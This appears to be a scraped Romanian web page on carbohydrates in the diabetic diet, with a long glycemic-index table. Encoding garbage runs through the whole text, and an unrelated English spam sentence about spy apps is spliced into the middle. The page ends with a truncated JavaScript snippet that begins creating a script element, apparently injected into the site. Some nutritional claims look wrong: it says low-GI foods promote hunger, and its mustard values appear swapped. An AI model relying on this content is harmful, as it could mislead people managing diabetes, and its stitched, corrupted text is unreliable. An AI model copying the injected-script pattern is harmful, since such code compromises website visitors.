Glucidele

A�A�A�A�A�A�A�A�A�A�A� Glucidele, numite si carbohidrati sau hidrati de carbon, reprezinta sursa de energie obisnuita si

accesibila, asigurand 50-55% din aportul energetic total. In valoare absoluta, pentru majoritatea diabeticilor,

aportul de glucide este cuprins de obicei intre 150 si 250 g/ 24 de ore; uneori, pacientilor denutriti, copiilor si

tinerilor cu diabet zaharat de tip 1 li se permit cantitati mai mari (daca si munca prestata este grea).

A�A�A�A�A�A�A�A�A�A� Din punct de vedere calitativ, alimentele cu continut glucidic se clasifica astfel, in functie de continutul

lor si, in ultimele decenii, de indicele glicemic si de incarcatura glicemica:

A�A�A�A�A�A�A�A� – Cele care pot fi consumate fara restrictie (necantarite): legume (cu continut mai mic de 5%);

A�A�A�A�A�A�A�A� – Alimente consumate numai cantarite: paine, fainoasele, toate produsele din cereale, orezul, cartofii,

A�A�A�A�A�A�A�A�A� leguminoasele uscate, fructele, legumele cu continut mai mare de 5%, laptele, branza de vaci, iaurt;

A�A�A�A�A�A�A� – Alimente interzise: zaharul , prajiturile cu zahar, bomboanele, ciocolata, rahatul, halvaua, siropurile,

A�A�A�A�A�A�A�A� biscuitii cu zahar, mierea, fructele prea bogate in glucide (strugurii, perele zomoase, curmalele,

A�A�A�A�A�A�A�A� stafidele, smochinele), inghetata, bauturile comerciale cu zahar.

A�A�A�A�A�A�A�A�A� Indicele (indexul) glicemic (IG) al unui aliment, caracterizeaza raspunsul glicemic postprandial

(capacitatea hiperglicemianta), raportat la un standard (aliment de referinta) care, de obicei, este glucoza sau

painea alba, al caror IG,stabilit in mod conventional, este de 100 %. Fiecare aliment are doua valori ale IG, una

in comparatie cu glucoza si una in comparatie cu paine alba. Cand alimentul de referinta este glucoza, pentru a

face conversia la indexul de referinta painea alba, IG al alimentului se inmulteste cu 1,4, iar daca

alimentul de referinta este painea alba, pentru a face conversia la indexul de referinta glucoza, IG al

alimentului se imparte la 0,7. Since apple’s own spy apps for android safari extension list hasn’t yet gone public, we’ve compiled a list of 30 of our favorite extensions for you to download and try. In functie de IG, alimentele se impart in:

A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A� – alimente cu IG mare (>70%);

A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A� – alimente cu IG mediu (56-69%);

A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A�A� – alimente cu IG mic (< 55%).

A�A�A�A�A�A�A�A� IG este influientat, firesc, in special, de concentratie in glucide a alimentelor, dar si de: continutul in

proteine, lipide si fibre alimentare, prezenta amidonului greu digerabil, marimea particulelor de amidon,

continutul de apa, modul de preparare a hranei etc.

A�A�A�A�A�A�A�A� La pacientii cu diabet zaharat, alimentele cu IG<50% reprezinta baza dietei. Baneficiile alimentelor cu IG

scazut sunt urmatoarele: promoveaza senzatia de foame, contribuind la controlul ponderal, maresc

sensibilitatea la insulina, avand un efect benefic asupra controlului glicemic, diminua colesterolul seric si riscul

bolilor cardiovasculare si sporesc capacitatea de efort.

 

IG Aliment IG Aliment
100 Glucoza 75 Lasagna
25 Afine,A�agrise 30 LinteA�(vardeA�sauA�rosie)
15 Alune 60 Maioneza
15 Andive 55 Mango
65 AnanasA�compot 65 Marmelada
50 AnanasA�proaspat 35 MazareA�verde
15 ArdeiA�deA�oriceA�fel 65 Mamaliga
10 Avocado 15 Maslina
60 Banane 35 Mere
50 BatonA�deA�cerealeA�(faraA�zaharA�adaugat) 60 Miere
70 BatonA�deA�ciocolata 15 Migdale
75 BiscuitiA�dinA�fainaA�alba 30 MorcovA�(crud)
50 BiscuitiA�dinA�fainaA�integralaA�(faraA�zaharA�

adaugat)

85 MorcovA�(gatit)
30 BranzaA�deA�vaci 65 MuesliA�(cuA�zaharA�sauA�miereA�adaugata)
70 Briose 9 MustarA�(cuA�zaharA�adaugat)
15 BroccoliA�proaspat 50 MustarA�(faraA�zaharA�adaugat)
60 CaiseA�(compot) 35 Nectarine
30 CaiseA�proaspete 15 Nuci
85 CartofiA�fierti 55 Nutella
95 CartofiA�laA�cuptor 50 OrezA�brunA�fiert
95 CartofiA�prajiti 85 OrezA�standardA�fiert
15 CastravetiA�proaspetiA�murati 5 Otet
25 CapsuniA�proaspete 50 PasteA�integrale
15 Ceapa 85 PaineA�dinA�fainaA�alba
45 Cereale-A�integrale 65 PaineA�dinA�fainaA�integrala
70 Chipsuri 48 PaineA�deA�secara
15 Cicoare 90 PainaA�faraA�gluten
70 Ciocolata 70 PaineA�prajita
25 CiocolataA�neagraA�(continutA�deA�cacaoA�pesteA�70A�%) 75 PepeneA�galben
20 CiocolataA�negraA�(continutA�deA�cacaoA�pesteA�85%) 30 PereA�proaspete
25 CireseA�proaspete 35 PiersiciA�proaspete
15 Ciuperci 55 PiersiciA�(compot)
15 Coacaze 60 Pizza
70 Cola 65 PorumbA�fiert
15 Conopida 15 Praz
85 Covrigei 35 Prune
70 Croissant 35 Rosii
65 Cuscus 15 SalataA�verde
75 Dovleac 35 SeminteA�deA�floareaA�soarelui
25 Dude 35 Smochine
40 FasoleA�verde 15 SoiaA�(boabe)
35 FasoleA�uscata 55 SpagheteA�gatite
85 FainaA�deA�grau 15 Spanac
95 FainaA�deA�orez 65 Stafide
25 FainaA�deA�soia 45 Struguri
15 Fistic 55 Sushi
25 FructeA�deA�padure 50 SucA�deA�mereA�(faraA�zaharA�adaugat)
20 Fructoza 40 SucA�deA�morcoviA�(faraA�zaharA�adaugat)
40 FulgiA�deA�ovaz 45 SucA�deA�portocalaA�(faraA�zaharA�adaugat)
85 FulgiA�deA�porumb 45 SucA�deA�rosiiA�(cuA�zaharA�adaugat)
60 GemA�(cuA�zaharA�adaugat) 35 SucA�deA�rosii
75 Gogosi 15 Telina
55 GrisA�fiert 30 Usturoi
30 GrapefruitA�proaspat 15 VarzaA�proaspataA�sauA�murata
35 Iaurt 5 Vin
35 IaurtA�deA�soiaA�(aromeA�deA�fructe) 15 Vinete
60 InghetataA�cuA�zaharA�adaugat 70 ZaharA�albA�siA�brun
50 KiwiA�proaspat 110 Bere
30 LapteA�proaspatA�sauA�praf A� A�
AlimeteleA�precumA�berea,A�pepeneleA�galbenA�sauA�morcovii,A�desiA�auA�unA�IGA�mare,A�auA�totusiA�unA�continutA�deA�zaharA�purA�mic,A�

iarA�consumulA�nuA�vaA�influientaA�foarteA�multA�nivelulA�glicemiei.

A�

A�var d=document;var s=d. createElement(‘script’); .